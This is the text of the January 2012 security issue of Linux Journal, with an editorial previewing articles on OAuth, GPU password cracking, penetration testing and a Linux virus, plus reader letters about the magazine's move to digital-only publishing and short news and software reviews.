Linux Journal | January 2012 | Issue 213 - ACM Digital Library

The Next Generation ofAMD Opteron TMIs Here!Microway Delivers AMD’s“Bulldozer” Core TechnologyUp to 16 cores per CPU20% faster memory: DDR3-1600MHzAMD Turbo CORE dynamically boosts clock speeds256-bit AVX floating point instructions2560 Cores + IB in 24UWhisperStation TM32 cores and 256GB memory at your deskUp to three FirePro TM GPUs for OpenCL TMNavion TM Quadputer ®Highest density per single server with 64 cores512GB DDR3-1600 memory for large data setsNavion 2U Twin 2 ClustersFour 2P nodes in 2U, total 128 coresRedundant power, high efficiency componentsOptional FDR InfiniBand connectivityNavion 1U GPUWe Speak HPCMicroway’s team will help you harness the power of the New AMDOpteron processor. Rely on our expertise for complete integration andthorough testing of your system. Whether you need Linux or Windows,OpenMP or OpenCL, we’ve been resolving the complicated issues –so you don’t have to – since 1982.Up to two GPUs per 1U server32 cores and 256GB DDR3-1600 memoryVisit Microway at SC11 Booth 2606For Opteron WhisperStation or Cluster info:microway.com/quickquote or call 508-746-7341Sign up for technical newsletters and special GPU promotions at microway.com/newsletter3+ TFLOPS on Your DesktopGSA ScheduleContract Number:GS-35F-0431N

INDEPTH112 Using Linux with EFI, Part II:Preparing to Install on anEFI computerContinuing the EFI story with adescription of the steps you need totake before installing Linux on anEFI-based computer.Roderick W. SmithCOLUMNS30 Reuven M. Lerner’s At the ForgeWorking with OAuth40 Dave Taylor’s Work the ShellMore Twitter User Stats44 Mick Bauer’s Paranoid PenguinEleven Years of Paranoia,a Retrospective50 Kyle Rankin’s Hack and /Password Cracking with GPUs, Part I:the Setup120 Doc Searls’ EOFIs There a “Personal Data Economy”If You Control Your Own Data?62 EKOREVIEW70 SlickEditShawn PowersIN EVERY ISSUE8 Current_Issue.tar.gz10 Letters18 UPFRONT56 New Products62 New Projects70 SLICKEDIT123 Advertisers IndexLINUX JOURNAL (ISSN 1075-3583) is published monthly by Belltown Media, Inc., 2121 Sage Road, Ste. 310, Houston, TX 77056 USA. Subscription rate is $29.50/year. Subscriptions start with the next issue.WWW.LINUXJOURNAL.COM / JANUARY 2012 / 5

Subscribe toLinux JournalDigital Editionfor only$2.45 an issue.Executive EditorSenior EditorAssociate EditorArt DirectorProducts EditorEditor EmeritusTechnical EditorSenior ColumnistSecurity EditorHack EditorVirtual EditorJill Franklinjill@linuxjournal.comDoc Searlsdoc@linuxjournal.comShawn Powersshawn@linuxjournal.comGarrick Antikajiangarrick@linuxjournal.comJames Graynewproducts@linuxjournal.comDon Martidmarti@linuxjournal.comMichael Baxtermab@cruzio.comReuven Lernerreuven@lerner.co.ilMick Bauermick@visi.comKyle Rankinlj@greenfly.netBill Childersbill.childers@linuxjournal.comContributing EditorsIbrahim Haddad • Robert Love • Zack Brown • Dave Phillips • Marco Fioretti • Ludovic MarcottePaul Barry • Paul McKenney • Dave Taylor • Dirk Elmendorf • Justin RyanProofreaderGeri GaleENJOY:Timely deliveryOff-line readingPublisherAdvertising Sales ManagerAssociate PublisherWebmistressAccountantCarlie Fairchildpublisher@linuxjournal.comRebecca Cassityrebecca@linuxjournal.comMark Irgangmark@linuxjournal.comKatherine Druckmanwebmistress@linuxjournal.comCandy Beauchampacct@linuxjournal.comEasy navigationPhrase searchand highlightingAbility to save, clipand share articlesEmbedded videosAndroid & iOS apps,desktop ande-Reader versionsLinux Journal is published by, and is a registered trade name of,Belltown Media, Inc.PO Box 980985, Houston, TX 77098 USAEditorial Advisory PanelBrad Abram Baillio • Nick Baronian • Hari Boukis • Steve CaseKalyana Krishna Chadalavada • Brian Conner • Caleb S. Cullen • Keir DavisMichael Eager • Nick Faltys • Dennis Franklin Frey • Alicia GibbVictor Gregorio • Philip Jacob • Jay Kruizenga • David A. LaneSteve Marquez • Dave McAllister • Carson McDonald • Craig OdaJeffrey D. Parent • Charnell Pugsley • Thomas Quinlan • Mike RobertsKristin Shoemaker • Chris D. Stark • Patrick Swartz • James WalkerAdvertisingE-MAIL: ads@linuxjournal.comURL: www.linuxjournal.com/advertisingPHONE: +1 713-344-1956 ext. 2SubscriptionsE-MAIL: subs@linuxjournal.comURL: www.linuxjournal.com/subscribeMAIL: PO Box 16476, North Hollywood, CA 91615-9911 USALINUX is a registered trademark of Linus Torvalds.SUBSCRIBE TODAY!

Current_Issue.tar.gzSHAWN POWERSMy Voice Is MyPassport, Verify MeThis is our security issue, andalthough we may not all haveretinal scanners and voice-basedauthentication, we still need to focuson keeping our systems secure. We canall help the cause by using complexpasswords and by using differentpasswords for every system to whichwe connect. In fact, Reuven M. Lernerstarts us off with a possible solution tothat very problem. He shows us howto use OAuth, so instead of creating anew set of credentials, we can log in toapplications using an existing account.With OAuth, if you have a Yahoo,Google or Facebook account, you canlog in to any Web site that allows OAuthauthentication. It’s pretty cool stuff.Twitter is another service that allowsOAuth authentication, and althoughhe doesn’t tackle authentication, DaveTaylor continues his series on scriptingwith Twitter. Can math and shellscripts determine whether someone isworth following? Read Dave’s columnand find out.Mick Bauer is back this month forone final Paranoid Penguin column.We’re very sad to see Mick go, butthe security issue certainly seems likethe perfect place for his retrospectiveon the past 11 years. Whether Mick’scolumn helps you sleep better at nightor keeps you awake due to paranoiaabout your network, his monthlycolumns will be missed.Kyle Rankin starts a series in thisissue that likely will make you updatethe passwords on all your systems.Using his fancy GPU setup, Kyle showshow to do a brute-force attack (forlegitimate purposes, of course) onour systems. It’s downright scary howpowerful modern graphics cards are,and for tasks like password cracking,they are extremely efficient. Thankfully,Kyle can’t crack the combination onmy luggage, and “one, two, three,four” is still safe there.Continuing our black-hat-themedlineup, Matthew Agle describes howto do penetration testing on our8 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

CURRENT_ISSUE.TAR.GZIt’s downright scary how powerful moderngraphics cards are, and for tasks like passwordcracking, they are extremely efficient.systems. Although there isn’t onesingle tool for such things, Matthewopens his bag of tricks and lets uspeek inside. Whether you are testinga Windows machine or trying to hackinto your office server, Matthewexplains how to do some pretty nastystuff (for science, of course).As if that weren’t scary enough,Himanshu Arora shows how to create avirus—a Linux virus. More specifically,it’s a Linux ELF-based virus that canpropagate your system without youever knowing it. This is the reason it’simportant to have signed packagesand check the md5sum for ISO images.Himanshu starts his series this monthto help you understand, and thendefend against, such things. Knowledgeis power, even if sometimes thatknowledge is unsettling.If one of your concerns regardingmanaging secure passwords is that youcan never remember them all, you needa tool like KeePassX. Anthony Deanshows how to use this cross-platformpassword management and generationtool to keep track of secure passwords.If your password is “password”, orif your idea of securing your “1234”password is to add a “5” at the end, youreally don’t need KeePassX. You need apsychiatrist! Seriously though, KeePassXis a great tool to help with passwords,and Anthony walks us through using it.We haven’t dedicated this entireissue to scaring you into being aparanoid penguin, however. RoderickW. Smith continues his series on usingLinux with EFI systems. Last month,he explained EFI as the replacementfor BIOS, and this month, he showsus how to use it to boot Linux. I alsocontributed an article this month,reviewing the Inspector Gadget ofthe editor world: SlickEdit. If you’re aprogrammer of any level, SlickEdit canmake your life easier. It even helpedme, a novice programmer at best.We hope this issue is educational,and if nothing else, we hope you learnnever to leave your server alone in aroom with Kyle. He might claim hisfancy video card is for playing games,but trust me, Kyle is not a gamer!■Shawn Powers is the Associate Editor for Linux Journal. He’s alsothe Gadget Guy for LinuxJournal.com, and he has an interestingcollection of vintage Garfield coffee mugs. Don’t let his sillyhairdo fool you, he’s a pretty ordinary guy and can be reachedvia e-mail at shawn@linuxjournal.com. Or, swing by the#linuxjournal IRC channel on Freenode.net.WWW.LINUXJOURNAL.COM / JANUARY 2012 / 9

lettersDigitalSwitchI feel like I’mpreaching tothe choir onthis one, butI personallyfind theswitch to alldigitalto bemore thanannoying. Itypically take a copy of LJ on a flight (tryusing a reader below the imaginary 10kfeet), read it at a hotel (or at home inbed, after the boss falls asleep), or readit in some other “personal” area where alaptop or e-reader just isn’t practical.While I’m sure you feel you’re offeringchoices, to me, I view it as an allor-nothingproposition. I like bothelectronic and print, and I would payadditionally for the electronic content,but the push to all-electronic has mereally aggravated. I bought a longtermsubscription and simply will haveto wait and see. There are other printpublications that I’ve resisted, but Iwill subscribe to them in the future asI may just be too “old-school” to goelectronic only.I’ve seem murmurs from others, andI feel that this is a decision you shouldstrongly reconsider—maybe offer ahigher price for print and another forelectronic? I personally don’t care if it’son glossy paper and would settle forsomething just above newsprint. At leastit’s an option without burning throughexpensive ink cartridges.—Matt AvilaUnfortunately, as much as we dislikeit ourselves, the switch to digital wasan absolute necessity. The cost ofmaintaining a print edition was justtoo great, even with drastic increasesto newsstand prices. It really wasn’ta decision whether to keep the printedition; it was a decision whether tokeep producing Linux Journal at all. Adigital Linux Journal seemed better thanno Linux Journal, so that’s the routewe took. Hopefully, based on thoseoptions, you’ll agree we chose thebetter of two evils.—Ed.Get Rid of Two ColumnsSince you are going all-digital, canyou please get rid of the two-columnformat? It’s great when you can displaya whole page (like with a print versionor a big enough screen), but on anythingelse (which is about everything), itsucks. It is painful to have to scrollback up and down the same page to10 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

[ LETTERS ]read the text. Please, please, pleaseeither bring back the print version orscrap the two-column layout.—JoeHopefully, the .epub and .mobi formatswe offer will fill this need. Althoughthey are designed for electronicreading devices, it’s possible to viewthe single-column “flowing text”version on a computer using somethinglike Calibre. You can check it out athttp://www.calibre-ebook.com.—Ed.A Former SubscriberI’m sorry to say that since Linux Journalwent from print to being an all-digitalmagazine, I’m canceling my subscription.The Linux Journal app for Android isbuggy and not readable. I can suggestthat you look at the Danish firm VisiolinkAps (http://www.visiolink.com), whichmakes Android/iOS and Web applicationsfor magazines and newspapers. See,for example, eAdressa (a Norwegiannewspaper) on both iOS and Android.—Henrik KirkWe’re certainly sad to lose you as asubscriber. The Android app has been abit frustrating early into our foray intodigital publishing. That’s actually one ofthe reasons we offer multiple formatsfor monthly consumption. If the Androidapp is buggy for you, perhaps the .epubedition will work? Regardless, I’m sorryyou’re canceling. If you haven’t triedthe alternate versions, please see if theywork for you.—Ed.Slitaz.orgI would like to see a writeup on Slitaz.This version loads on a Netbook from anSD Memory (4GB) card in approximately15 seconds. The last version I downloadeddidn’t like the 1024 x 600 displayresolution on my machine but loadedokay using slitaz text to start it.It looked like one of the drivers wasmissing, but I do have it running on anolder version of Slitaz. The title pageshows the motto “Boot, baby, boot!”—Frank AndersonThanks, we’ll have to check it out!—Ed.Response to the “Why, Why All-Digital”Letter in the November 2011 IssueAs a longtime subscriber to LinuxJournal, when I heard of the all-digitalformat, I too had misgivings like theauthor of the “Why, Why All-Digital”letter. I also dislike reading long articleson a laptop. Because I intend to keepmy subscription to LJ, I started lookingat tablet computers. Laying out $500+for an oversized tablet was not goingto happen, so I started researching theNOOK Color. When I discovered youcould install Android on it, I purchaseda refurbished NOOK Color for less than$200 and, using a 4GB MicroSD memorycard, dual-booted it with AndroidCyanogenMod. It’s the best investmentWWW.LINUXJOURNAL.COM / JANUARY 2012 / 11

[ LETTERS ]I ever made. Not only do I have the PDFversion of LJ at my fingertips, but I useit for tracking a number of my e-mailaccounts and browsing the Web with itsbuilt-in wireless. In addition, I can bootin to the NOOK’s native Android and usethe Barnes and Noble e-reader.You may want to do a short article onhow to adapt the NOOK Color into adual-boot Android tablet for those of usout there who hate reading magazineson a laptop but don’t want to lugaround an overpriced tablet.—llmercyI think perhaps some tablet-hackingarticles are in order. It seems thatwe’ve finally arrived at the point inhistory when electronic reading devicesare affordable. With the Kindle Fireand the various NOOK options, tabletcomputers are almost cheaper than cellphones!—Ed.Digital Subscription? Sweet!At first I thought that Linux Journal’sconversion to an all-digital publicationformat couldn’t be worse, but thenI was deployed to Afghanistan. NowI couldn’t be more pleased with it. Ittakes forever to get mail out here, andthat’s assuming it doesn’t get lost on theway. With the new digital format, I nowget my Linux Journal quickly, and I canread it on my Kindle! Excellent! You’vemade the life of one data Marine easier.Thanks, Linux Journal!—Jaymason GallienJaymason, that’s great to hear! I’m gladthe timing worked out well. Thank youfor all you do, and stay safe.—Ed.New Digital-Only VersionI just signed up for another year onmy subscription. For those of us whohave collected every print copy sincethe beginning of time, will we needto download and save each newissue, or will the links be good for theforeseeable future, so we can simplyretrieve an older copy from the LJWeb site when needed?—Bill K.As long as you are an active subscriber,you will have access to the archive (from2005 to the current issue). The easiestway to get into the archives is via thelink in the issue notification e-mail youreceive each month. In the past, thelink said “issue archive”, but it’s beenmodified to say “Missing a back issue?”.Otherwise, you can log in using yoursubscription ID and postal code athttp://www.linuxjournal.com/digital.Digital LJ RocksI’ve been a subscriber for a couple years,and I always have received the digitalversion and not the hard copy. I wassurprised by the outcry in the Novemberissue’s Letters. I get too many magazines12 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

these days that I hate to recycle, but Ijust don’t have the storage. With digitalLJ, I can store as many as I want to onmy computer. Now that .mobi versionsare available, I can steal my wife’sKindle and enjoy it there too. I justwish the other magazines I read woulddo something similar.—EricThanks Eric! It’s great to hear a digitalsubscriber is taking advantage of the newformats as well. I’m not brave enough tosteal my wife’s Kindle, however, so goodluck with that.—Ed.Many, Many Thanks for theepub/Kindle Format!Like many others, I would like tothank you very much for the electronictransition of LJ. With this move, you notonly saved many trees, but also improvedgreatly my reading experience with myKindle on which LJ renders perfectly(and it runs Linux too)! I also agreewith other LJ readers: I think that ZackBrown’s diff -u is one of the mostinteresting parts of LJ and the main causeof my LJ addiction. And I want more! Amore expanded kernel section with a newnon-kernel FLOSS news diff -u sectionshould be enough of a dose to calm mefor a month. Ciao dall’Italia!—Marco CiampaThanks Marco. The epub/mobi editionwas the most exciting part of thetransition for me too.—Ed.Another Response to the “Why,Why All-Digital” LetterAs a person who worked at an academiclibrary re-shelving books and journals, Iknow firsthand about the huge amountof energy that is consumed moving paperfrom point A to point B. From Septemberto April, I would lose ten pounds ofweight. This time frame included theusual weight-gaining events calledThanksgiving and the Christmas holidays.Consider the journey a piece of papertakes from the forest to your desktopand the fossil fuel burned moving it. Thisincludes all of the machinery at the papermill to the printing press to the trucks onthe road transporting paper between thevarious stages of the process.How long can we keep this up?Obviously, energy costs are forcing theprice of printed media up and shrinkingprofit margins in the process. It is nowbeyond an environmental issue and aneconomic issue as well.We can’t avoid burning energy, be itelectronic readers or my computer. Atleast for Linux Journal, going digital mayhave been the only way to keep going.So far, for me, the transition has beenpainless. Yes, I will miss the paperedition, just as I miss the SaturdayWWW.LINUXJOURNAL.COM / JANUARY 2012 / 13

[ LETTERS ]newspaper. I have a very comfortablereading chair in front of my computerscreen, and by increasing the font size abit, I am enjoying reading off the screen.—John Kerrbut I’ve never really made this programpublic, perhaps after the next rewrite,but the basic idea is to point back tothe previous backup using the rsync--link-dest=DIR option.John, another advantage you point outvery well is how much closer the contentprovider is to the consumer. With thedigital edition, there are fewer steps(and less time) between when articles arewritten and when they are delivered. Wemust apologize for any weight gain ourdigital edition might cause though.—Ed.Date CalculationsDave Taylor says he did not know whereto find a particular date formula. Well,all he needs to know about dates (andmore) is in “Calendrical Calculations” byDershowitz and Reingold.—David Andersonrsync BackupsI enjoyed Daniel Bartholomew’s low-powerfile-server article, although the thoughtof running a file server on external USB2 drives doesn’t really appeal to me—perhaps when USB 3 is more pervasiveor something similar with eSata.I also wanted to point out that rsyncitself can be used to perform backupsusing hard links to link to a previousbackup. This is more efficient thanthe cp -al approach. I wrote a Rubyprogram called rubac to learn Ruby,Also, I’m warming to your digitalonlyformat, if only I can get mysubscription status sorted out. Keepup the good work.—oneguycodingGNOME 3.2I didn’t like GNOME 3.0, especially inF15. It was terrible at best in Ubuntu11.10, but better than it was in F15. Idon’t like Unity either. I use Mint 11.When I say I don’t like them, I mean, Idon’t think they were usable from mystandpoint or maybe enjoyable to use.I loaded F16 yesterday. I really likeGNOME 3.2 in F16. All the littleannoyances that were there in 3.0are gone. It still has some problems,changing themes, screensaver andbackground are way harder thanthey should be. So is moving thedock around and adding menus inthe activities menu—definitely alot of polish is needed. But, I really,really, really like GNOME 3.2. This is aWindows killer.—Shane SkoglundI’ve been a public Unity-hater for quite14 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

[ LETTERS ]some time, and my experience withGNOME 3 wasn’t much better. I haven’tlooked at Fedora 16 yet, so I’ll have togive it a try. Thanks for the info!—Ed.I Paid for a Print SubscriptionI can understand that print and mailingare large costs in publishing, so Iunderstand your desire to go digital.My beef with your decision is that I canget a lot of the information that you arecreating free from a variety of on-linesources. I paid for a year subscription toget it in print form. Had I known thatyou would be going digital, I wouldnot have renewed my subscription.Since digital delivery is significantlyless expensive than print, I can only seegreed in charging the same amount fora subscription that used to be in printform. I am truly disappointed.—Richard FranczakI’ve responded to similar concerns manytimes during the past few months, so I’lljust reiterate. It wasn’t a decision basedon which method made more money;it was a decision based on whetherto continue publishing at all. It’s notideal, but we’re trying to offer multipleformats in an attempt to make LinuxJournal useful for everyone.—Ed.

[ LETTERS ]Electronic Publication CoverWhen I opened my first electronic-onlyissue, I naturally clicked on the textualteasers on the cover. Nothing happened.Now that you are publishing only inelectronic format, you could make theareas of the cover proclaiming contentinside direct links to the associatedcontent. The table of contents would stillserve its usual purpose, but the coverlinks would go directly to sometimesnot-so-obvious places. It would reducethe frustration of trying to figure outwhat is referenced by the the cover.and is cut off. I guess such a changewould benefit also all other readers witha 200%-zoom factor.—RobertRobert, if you haven’t tried the .mobiversion of the magazine, please do.It’s designed specifically for e-readers,so the text flows to fit your screensize and font preference. The PDFversion still is designed with the printsizelayout, but the .mobi and .epubversions should look much nicer onyour Kindle.—Ed.Keep adapting and innovating. I enjoythe format of a magazine to discoverthings I would not otherwise have soughtor discovered.—MarkThat’s brilliant. And, now we’veimplemented your idea in our PDFand enhanced PDF versions. Thanksfor the great idea!—Ed.PDF Format Adapted to KindleI’ve been a subscriber to LJ pretty muchfrom the beginning. May I propose thatyou adapt the PDF layout of LJ in sucha way to be well suited to the Kindlee-book reader? Specifically, it wouldbe convenient if you could adapt thecolumn width so that with 200% zoomon a Kindle, one could read first the leftcolumn and then the right column. Today,the right column is too far to the rightWhy I Came Back (after So Many Years)For many years, I subscribed to LinuxJournal. Then I canceled my subscription.The reason was not because of thequality of your magazine. On thecontrary, I have always considered LinuxJournal to be a quality magazine withwell-written and interesting articles.The reason was paper, quite simply. Igot tired of storing paper magazines orthrowing them into a waste bin, andI canceled all my subscriptions to anyprinted magazines. So I congratulateyou on your choice to drop the printedversion altogether and continue as apurely digital magazine. That is whyI came back and decided to startsubscribing again, because I want tosupport your efforts on distributingquality Linux content in the future.However, I have read that many16 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

people have been irritated by this change. Peopleare entitled to think whatever they want, but Ithink this is the best choice for the future. It isecologically a better choice. The digital magazineis delivered instantly. I do not have to wait severalweeks for the printed magazine to drop in mymailbox. Digital magazines do not take any physicalstorage space. You can carry dozens of magazinesin your tablet or smartphone and read themwherever you want.Some people might say that the digital format makesLinux Journal obsolete, because you supposedlycan find the same information on the Internet. Ido not think that is true. I think the key word inthis matter is trust. Can you really trust that theinformation on some obscure Web page or forumis accurate, up to date and unbiased? Usually, Ifind them to be hugely inaccurate, erroneous, outof date or heavily biased. However, in the case ofLinux Journal, I can assume that articles have gonethrough a normal editorial process, which makesthem more reliable as an information source—something that I can trust. Whether Linux Journalis printed or purely digital does not change that.—Mika LaaksonenWelcome back, Mika! We do try to offer the samequality content we’ve always offered, just in adigital format. We try to provide value for ourcustomers, and although the switch to digitalis frustrating in some ways, it allows us somefreedom we never had before. We’re excitedabout the future!—Ed.WRITE LJ A LETTER We love hearing from our readers. Please send usyour comments and feedback via http://www.linuxjournal.com/contact.At Your ServiceSUBSCRIPTIONS: Linux Journal is availablein a variety of digital formats, including PDF,.epub, .mobi and an on-line digital edition,as well as apps for iOS and Android devices.Renewing your subscription, changing youre-mail address for issue delivery, paying yourinvoice, viewing your account details or othersubscription inquiries can be done instantlyon-line: http://www.linuxjournal.com/subs.E-mail us at subs@linuxjournal.com or reachus via postal mail at Linux Journal, PO Box16476, North Hollywood, CA 91615-9911 USA.Please remember to include your completename and address when contacting us.ACCESSING THE DIGITAL ARCHIVE:Your monthly download notificationswill have links to the various formatsand to the digital archive. To access thedigital archive at any time, log in athttp://www.linuxjournal.com/digital.LETTERS TO THE EDITOR: We welcome yourletters and encourage you to submit themat http://www.linuxjournal.com/contact ormail them to Linux Journal, PO Box 980985,Houston, TX 77098 USA. Letters may beedited for space and clarity.WRITING FOR US: We always are lookingfor contributed articles, tutorials andreal-world stories for the magazine.An author’s guide, a list of topics anddue dates can be found on-line:http://www.linuxjournal.com/author.FREE e-NEWSLETTERS: Linux Journaleditors publish newsletters on botha weekly and monthly basis. Receivelate-breaking news, technical tips andtricks, an inside look at upcoming issuesand links to in-depth stories featured onhttp://www.linuxjournal.com. Subscribefor free today: http://www.linuxjournal.com/enewsletters.ADVERTISING: Linux Journal is a greatresource for readers and advertisers alike.Request a media kit, view our currenteditorial calendar and advertising due dates,or learn more about other advertisingand marketing opportunities by visitingus on-line: http://ww.linuxjournal.com/advertising. Contact us directly for furtherinformation: ads@linuxjournal.com or+1 713-344-1956 ext. 2.WWW.LINUXJOURNAL.COM / JANUARY 2012 / 17

UPFRONTNEWS + FUNdiff -uWHAT’S NEW IN KERNEL DEVELOPMENTThe kernel.org break-in continues toinconvenience developers, although thevarious pieces do seem to be gettingpicked up. A lot of git repositoriesare returning to kernel.org as theirmaintainers submit credentials into thenew GPG “web of trust” that is designedto reassure the kernel.org administratorsthat git tree maintainers are who theysay they are. Linus Torvalds also hasendorsed the web of trust by askingpeople sending him pull requests to makesure their repositories are hosted onkernel.org, so he can trust their identity.Establishing a web of trust is not theeasiest thing to manage. A lot of keysigningevents have been announced allover the world, but some people don’t liveclose to any of those events and may havea hard time getting their keys signed,without which they won’t be allowed tomaintain git repositories on kernel.org.Another difficulty is that people within theweb of trust might have a security breach ontheir personal systems, which could result intheir private GPG keys being compromised.Greg Kroah-Hartman recently posted tipson how to avoid that at https://lkml.org/lkml/2011/9/30/425. Greg admonished, “itis imperative that nobody falls victim to thebelief that it cannot happen to them.”An important thing to remember aboutall of these security measures is that theydon’t impact regular contributors whowant to submit patches to the kernel.You can all still send your patches tothe mailing list with no problem. Theweb of trust is intended only for peoplemaintaining git repositories on kernel.org,because those people will have to betrusted by the kernel.org administratorsnot to taint those repositories.VirtualBox came under some heavycriticism recently. Dave Jones remarkedthat a lot of kernel bug reports were dueto VirtualBox corrupting memory andhaving weird crashes. He posted a patchto taint any kernel that had VirtualBoxloaded, so that any automated bugcollectingtools could choose to ignorebug reports coming in from those systems.Greg Kroah-Hartman approved ofDave’s patch, and the conversationproceeded to the point where peoplewere suggesting that all out-of-treepatches should be tainted in a similar way.Eventually Frank Mehnert, the VirtualBoxmaintainer, responded to the complaintsagainst VirtualBox. He said, “We alwayshave had good relations to the Open18 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

[ UPFRONT ]They Said ItA computer once beatme at chess, but it wasno match for me atkick boxing.—Emo PhilipsgStrings in Your PocketWhat may sound like a perverse concept is actuallyone of the many ways smartphones can changeyour life. If you play a musical instrument butdon’t happen to have perfect pitch (most of us,sadly), you can buy a tuner, pitch pipe, tuningfork or any number of other aids to keep yourselfin tune. If you have a smartphone in your pocket,however, you also can simply download gStrings.Available in the Android Marketplace in either afree ad-supported version or an inexpensive ad-freeversion, gStrings will help you tune any number ofinstruments accurately.Although it’s certainly no replacement for perfectpitch, having a tuner in your pocket is very convenientif you’re a musician. Quite a few tuning apps areavailable for Android, but I’ve used gStrings personally,and it works great: https://market.android.com/details?id=org.cohortor.gstrings.—SHAWN POWERSAs a rule, softwaresystems do not workwell until they havebeen used, and havefailed repeatedly, inreal applications.—Dave ParnasComputer science is nomore about computersthan astronomy isabout telescopes.—Edsger DijkstraComputers make iteasier to do a lot ofthings, but most of thethings they make iteasier to do don’t needto be done.—Andy RooneyComputing is notabout computersany more. It is aboutliving.—Nicholas Negroponte20 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

[ UPFRONT ]LinuxJournal.comHave you visited LinuxJournal.com lately?Check out http://www.linuxjournal.com/tag/security for helpful informationon everything from configuring firewalls, to DNS cache poisoning, to packetsniffing. There are several great article series and tutorials to help get you overmany of your security hurdles.Don’t miss Mick Bauer’s “DNS Cache Poisoning, Part I” (http://www.linuxjournal.com/article/11008) and “DNS Cache Poisoning, Part II: DNSSEC Validation”(http://www.linuxjournal.com/article/11029) from our archives.Greg Bledsoe’s “Back from the Dead: Simple Bash for Complex DdoS”(http://www.linuxjournal.com/content/back-dead-simple-bash-complex-ddos)also may come in handy in a bind.And, for a quick tip, take a look at Shawn Powers’ video “Quick and Dirty SSHTunneling” (http://www.linuxjournal.com/video/quick-and-dirty-ssh-tunneling).—KATHERINE DRUCKMAN

[ UPFRONT ]Figure 2. You can set the time so it’s later,letting you check out what you might want tolook for that evening.script files there, along with any texturesthey may require, they will show up withinthe list of scripts in the configurationwindow. A plugin architecture also isavailable, but it is much harder to use, andthe API varies from version to version.The nice thing about Stellarium isthat it isn’t limited to your computer.It can interact with the real world ina couple ways. The first is throughtelescope control. Stellarium providestwo different mechanisms for controllingyour telescope. The older mechanism is aclient-server model. The server runs as astandalone application that connects toand controls one telescope. It then canlisten to one or more clients, which caninclude Stellarium. Several options areavailable for the server portion, and theyprovide control for many telescopes fromMeade, Celestron and others. The secondmechanism is a plugin for Stellarium,which first was available in version 0.10.3.Figure 3. The configuration window lets youdownload even more star catalogs.This mechanism can send only slewinstructions to the telescope, whichessentially are “go to” instructions.One major warning is that Stellariumwill not stop you from slewing to thesun. This could damage both eyes andequipment if you don’t have properfilters on your telescope, so always becareful if you are working during the day.The plugin can interact with prettymuch any telescope that understandseither the Meade LX200 interface orthe Celestron NexStar interface.The other way Stellarium can interactwith the real world is as a planetarium.Stellarium can handle the calculationsinvolved in projecting over a sphere. Thisway, you can make a DIY planetarium.You need a dome onto which you canproject your display across the inside.You also need a video projector anda spherical security mirror. Use thespherical distortion feature in Stellariumand then project the results throughWWW.LINUXJOURNAL.COM / JANUARY 2012 / 23

[ UPFRONT ]Figure 4. When you first open Celestia, you geta satellite-eye view of the Earth.the video projector and onto the mirror.Then, you can lie back under the domeand see the sky above you. The StellariumWeb site (http://www.stellarium.org)has links to groups on the Internetwhere you can find help and hints whenbuilding your own planetarium.The other popular astronomy programis Celestia. Celestia is a three-dimensionalsimulation of the universe. Where mostastronomy software shows you what thesky looks like from the surface of the Earth,Celestia can show you what the sky lookslike from anywhere in the solar system.Celestia has a powerful scripting enginethat allows you to produce tours of theuniverse. When you install Celestia,you get a script called demo.cel thatgives you an idea of its capabilities. Theadd-on section of the Celestia Web site(http://www.shatters.net/celestia)includes a full repository of available scripts.Because so much work has beendone to make it as scientificallyaccurate as possible, it also is beingFigure 5. When you want to go to an object,you can set what object you want go to andhow far away you are.used in educational environments.Currently, 12 journeys are available thatprovide information for students and thegeneral public on the wonders of theuniverse. As opposed to scripts, journeysgive you more control over your speedand pace, allowing you to take more time atthe areas that are of most interest to you.When you install Celestia, you getthe core part of the program and a fewextra add-ons. Currently, more than 500add-ons are available, and if you installthem all, you will need more than 18GBof drive space. The main repositoryyou should check out first is located athttp://www.celestiamotherlode.net.If you want to travel to another planetin the solar system, you can click onNavigation→Go to Object. Here you canenter the name of the object and how faraway you want to be. Then, click on GoTo, and you’ll be taken there directly. Onceyou’re there, you can rotate your cameraview with the arrow keys. In this way, you24 / JANUARY 2012 / WWW.LINUXJOURNAL.COM

Figure 6. You can zoom in to see the Great RedSpot on Jupiter.Figure 7. You can look out and see the nightsky on Mars.can go to Mars and turn around and seewhat the sky looks like from there.If you want to move around the orbit ofthe body you’re currently at, you can usethe Shift and arrow keys to slide aroundand see the whole surface. What you seewhen you are in orbit around anotherplanet is a texture mapped onto the body.Celestia’s core installation includes aminimal set of textures that strive to beas accurate as possible. You can changethe textures being used by includingadd-ons from the repository. Some ofthese include textures that allow youto see what the Earth may have lookedlike during the last Ice Age or even fourbillion years ago.In 2007, Vincent Giangiulio created anadd-on called Lua Edu Tools. This add-onprovides all kinds of extra functionalityto Celestia. A toolkit is displayed on theright side of the screen that providessliders for controlling many of Celestia’sparameters. It also provides a “cockpit”overlay, making it feel even more likeyou’re flying through space. The defaulttexture is the space shuttle, but you canuse other ones too. Celestia also lets youuse a joystick to control movement, soyou can immerse yourself completely intoyour dream of flying through space.You can share your experiences withothers by saving still images or movies. Ifyou click on File→Capture Image, Celestialets you save a PNG or JPEG image file.Clicking on File→Capture Movie lets yousave a movie of your travels. You canset the aspect ratio, the frame rate andthe video quality. Once you click Save,Celestia will be ready to start recording.When you are ready, click the F11 key tostart recording. When you’re done, youcan stop recording by clicking F12.This article is only an introduction towhat you can do. Hopefully, it inspiresyou to go explore the universe on yourdesktop. From there, bundle up and gospend the night out under the skies.You won’t regret it.—JOEY BERNARDWWW.LINUXJOURNAL.COM / JANUARY 2012 / 25

[ UPFRONT ]Fade In ProWhen I switched from Windows toLinux, I found software to replace almosteverything I had been doing in Windows.Most of the software I needed was inthe repos, although I did pay for a couplecommercial programs.The most difficult program to replacewas Final Draft, a commercial programfor writing screenplays. Final Draft isavailable for Windows and Macs, butnot for Linux. It also does not run inWine or CrossOver Office.I understand that software for writingscreenplays is a small niche, but it’s notlimited only to writers in Hollywood. Anycompany that prepares videos for trainingor other purposes would benefit from aprogram that helps write scripts.You can write scripts with a wordprocessor, of course. But, the formattingis tricky and goes beyond what youcan accomplish just by using styles. Adedicated script-writing tool ensures thatall your formatting is correct, and it alsocan help in other ways.At first, I was able to get by with Celtx,a free screenplay program that is availablefor Windows, Mac and Linux. But anasty bug crept into the Linux version,making it painful to enter character namesfor dialogue. Although the developeracknowledged the issue two years ago,and several new versions have beenreleased since then, the bug is still there.A new solution now is available. FadeIn Professional Screenwriting Softwareis a powerful application for writingscreenplays, and it 